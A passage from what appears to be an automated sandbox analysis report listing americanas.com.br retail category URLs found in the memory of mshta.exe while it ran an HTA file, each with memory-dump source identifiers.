00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700415045.0000000009A96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=dk_hm_at_suplemento
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658292979.0000000003378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747968255.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2765719416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menuz
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748463269.0000000009405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/suplementosgX1
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/telefonia-fixa?chave=pfm_home_telefonia_menu
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A856000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776701810.000000000C12C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009333000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747475403.000000000C12A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/acessorios-para-tv-e-video?chave=pfm_hm_tt
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717099166.0000000009A8C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714211819.0000000009A89000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2716936733.0000000009A8A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705339343.0000000009A87000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/home-theater?chave=pfm_hm_tt_1_0_home-thea
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777180906.000000000C30B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2752157960.000000000C30A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/tv/g/marca-LG/marca-Lg/marca-lg?viewMode=l
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705339343.0000000009A87000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714738205.0000000009A88000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/tv?chave=pfm_hm_tt_1_0_tv
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.0000000009355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726617731.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=dk_hm_at_tvs
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=dk_hm_at_tvsmeta.largemeta.large.hei
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744022226.0000000006E98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727692959.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_hm_tt_1_0_tv-e-home-theater
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_hm_tt_1_0_tv-e-home-theatera
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_home_tv_menu
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.0000000009355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726617731.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=dk_hm_at_ud
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=dk_hm_at_udmeta.largemeta.large.
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=pfm_home_ud_menu
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748463269.0000000009405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidadesge
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655302428.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/vale-presente?chave=pfm_home_valepresentes_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/vestuario-esportivo?chave=pfm_home_vestuarioesportivo_menu
